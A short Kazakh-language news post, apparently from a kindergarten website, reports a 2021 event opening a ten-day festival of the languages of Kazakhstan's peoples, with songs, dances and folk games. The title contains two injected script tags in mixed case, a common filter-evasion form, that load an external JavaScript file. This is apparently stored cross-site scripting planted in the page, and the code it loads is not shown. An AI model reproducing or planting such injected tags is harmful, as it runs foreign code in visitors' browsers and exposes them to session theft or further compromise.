«Тіл – әр халықтың байлығы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.09.2021

Бүгін, яғни қыркүйектің 6-шы жұлдызында Циалковский көшесіндегі  МКҚК  "Ақбота"  бөбекжайында ҚР халықтарының тілдер мерекесіне  арналған  «Тіл – әр халықтың байлығы»  атты  онкүндіктің  салтанатты ашылуына байланысты, іс-шара   өткізілді. ҚР халықтарының тілдер мерекесі күні туралы  айтып түсіндірілді. Мерекелік  іс -шара  үш тілде құттықтаумен басталды. Балалар ,"Алға -Қазақстан" атты  би ырғағымен ортаға шықты.ҚР гимні орындалды.  Ертеңгілікте балалар тілдер мерекесіне арнап өздерінің дайындаған өлең шумақтарын қазақ, орыс , ағылшын тілінде өлең  шумақтарын айтып, би - өнерлерiн тамашалады. Іс-шара барысында "Қазақстан" ,"Наш край" атты әндерді музыкалық  сүйемелдеу арқылы шырқалды. Әр ұлттың өзіне тән ойындары болғандықтан , қазақ халқының ойыны "Қыз қуу","Ханталапай" және орыс халқының ойыны  "Гу-си, гу -си!"Га-га-га! " атты ойындары  ойналды. Балалар қызығып ойнады. «Тіл – әр халықтың байлығы»  атты іс-шара "Мен, сен, ол" әнімен аяқталды. Жақсы деңгейде,қызықты  және әсерлі өтті. Мереке соңында, естелік ретінде фото-суретке түстік.

Просмотров: 238


Пікір қосу



Деректерді қолтаңбаға қосу